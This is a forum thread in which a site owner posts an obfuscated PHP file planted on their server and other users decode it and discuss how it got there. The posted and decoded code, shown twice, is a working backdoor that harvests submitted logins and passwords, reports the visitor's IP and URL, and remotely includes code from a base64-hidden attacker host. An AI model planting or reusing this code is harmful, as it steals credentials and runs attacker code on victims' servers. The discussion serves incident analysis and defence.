Help in decoding XSS Script

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Help in decoding XSS Script

Post by prasant4u »

A few days ago my forum had xss attack.. i found .htaccess and two random named php file ( like base.php , create.php ) injected in my every 777 upload folders... I am curious to know what code they used.. can someone decode this code please. thanks in advance.

Code: Select all

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("class newhttp{
var $fullurl; var $p_url; var $conn_id; var $flushed; var $mode = 4; var $defmode; var $redirects = 0; var $binary; var $options; var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; }
function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { $this->mode += 2; } $this->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; }
function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } }
function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } }
function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; }
function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); }
function stream_seek($offset, $whence) { return false; }
function stream_tell() { return 0; }
function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (strpos($data, 'Location: ') !== false) { $new_location = trim(str_replace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (strpos($data,'Content-Length: ') !== false) { $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); } elseif (strpos($data,'Date: ') !== false) { $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data)); } elseif (strpos($data,'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; }
function stream_stat() { $this->stream_flush(); return $this->stat; }
function dir_opendir($path, $options) { return false; }
function dir_readdir() { return ''; }
function dir_rewinddir() { return ''; }
function dir_closedir() { return; }
function url_stat($path, $flags) { return array(); }
function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); }
}if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}
$rkht=1;if(version_compare(PHP_VERSION,'5.2','>=')){if(ini_get('allow_url_include')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(ini_get('allow_url_fopen')){$rkht=1;}else{$rkht=0;}}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1){if(!@include_once(base64_decode("aHR0cDovLw==").$v)){}}
else{stream_wrapper_register('http2','newhttp');if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v)){}}")); ?>
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Simple: replace eval with print
Also, this is not XSS, it's either compromised FTP or a compromised upload script.
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?

if possible plz decode some lines for me... i can't get it...
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Code: Select all

<?php
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) 
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close';
		if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) 
		{ 
			return false; 
		} 
		if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) 
		{ 
			return false; 
		} 
		global $http_response_header; 
		$http_response_header = fgets($this->conn_id, 300); 
		$data = rtrim($http_response_header); 
		preg_match('#.* ([0-9]+) (.*)#i', $data, $head); 
		if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) 
		{ 
			$data = rtrim(fgets($this->conn_id, 300)); 
			while (!empty($data)) 
			{ 
				if (strpos($data, 'Location: ') !== false) 
				{ 
					$new_location = trim(str_replace('Location: ', '', $data)); 
					break; 
				} 
				$data = rtrim(fgets($this->conn_id, 300));
			} 
			trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); 
			$this->stream_close(); 
			return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
		} 
		$data = rtrim(fgets($this->conn_id, 1024)); 
		while (!empty($data)) 
		{ 
			$http_response_header .= $data."\r\n"; 
			if (strpos($data,'Content-Length: ') !== false) 
			{ 
				$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); 
			} 
			elseif (strpos($data,'Date: ') !== false) 
			{ 
				$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
			} 
			elseif (strpos($data,'Last-Modified: ') !== false) 
			{ 
				$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
			} 
			$data = rtrim(fgets($this->conn_id, 1024));
		} 
		if ($head[1] >= 400) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); 
			return false; 
		} 
		if ($head[1] == 304) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); 
			return false; 
		} 
		return true; 
	}
}
function stream_stat() { 
	$this->stream_flush();
	return $this->stat; 
}
function dir_opendir($path, $options) { 
	return false; 
}
function dir_readdir() { 
return ''; 
}
function dir_rewinddir() { 
	return '';
}
function dir_closedir() { 
	return; 
}
function url_stat($path, $flags) { 
	return array(); 
}
function context() { 
	if (!$this->context) 
	{ 
		$this->context = stream_context_create();
	}	
	$c = stream_context_get_options($this->context); 
	return (isset($c['http']) ? $c['http'] : array()); 
}
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v))
	{
	}
}
else
{
	stream_wrapper_register('http2','newhttp');
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v))
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Last edited by Weirdan on Thu Aug 12, 2010 5:56 pm, edited 1 time in total.
Reason: [php] -> [syntax=php]
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Thanks everyone for your help.. :) i ve disabled url_include function in server
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?
755 is read and execute, is it not?
If files from the 'upload' folder are included, and had PHP code in, then it'd explain how it was shell'd.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

I didn't say your diagnosis was wrong, only that it wasn't the only possible one.
Post Reply